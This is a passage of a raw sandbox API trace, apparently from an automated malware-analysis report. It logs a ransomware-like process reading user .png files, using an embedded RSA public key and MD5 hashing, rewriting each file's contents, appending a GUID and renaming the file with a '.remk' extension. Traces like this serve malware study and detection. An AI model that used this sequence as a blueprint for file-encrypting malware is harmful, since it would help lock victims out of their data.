lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.669] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.671] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.671] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x15c3e, lpOverlapped=0x0) returned 1 [0236.672] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.672] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.672] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.672] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.673] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.673] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.673] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.673] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.673] GetLastError () returned 0x0 [0236.673] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.673] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.674] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.674] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.674] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x15c40) returned 0x37cf820 [0236.674] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37ced90 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cedd8 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc888 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.675] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.675] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.675] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc888 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc840 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc828 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.677] GetCurrentThreadId () returned 0x314 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5f40 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.677] GetCurrentThreadId () returned 0x314 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.677] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.677] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc888 [0236.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.678] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc8a0 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc870 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc858 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc8b8 [0236.679] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc858 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc870 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc888 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8b8 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.680] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.680] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.681] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc8a0 | out: hHeap=0x630000) returned 1 [0236.681] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cedd8 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.682] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x15c39, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x15c39, lpOverlapped=0x0) returned 1 [0236.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.683] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x15c3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.683] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.683] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.684] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.684] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.684] CloseHandle (hObject=0x640) returned 1 [0236.691] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\cO_.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\co_.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\cO_.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\co_.png.remk")) returned 1 [0236.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.692] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.693] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x404bde10, ftCreationTime.dwHighDateTime=0x1d5e2cb, ftLastAccessTime.dwLowDateTime=0x4b7ad520, ftLastAccessTime.dwHighDateTime=0x1d5e5ff, ftLastWriteTime.dwLowDateTime=0x4b7ad520, ftLastWriteTime.dwHighDateTime=0x1d5e5ff, nFileSizeHigh=0x0, nFileSizeLow=0xd2fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ku5zMZBRK.png", cAlternateFileName="KU5ZMZ~1.PNG")) returned 1 [0236.693] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ku5zMZBRK.png") returned=".png" [0236.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\MJpyx6aDoSvpIH\\ku5zMZBRK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\mjpyx6adosvpih\\ku5zmzbrk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.696] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=54014) returned 1 [0236.696] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.699] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd2d8, lpNewFilePointer=0x0, 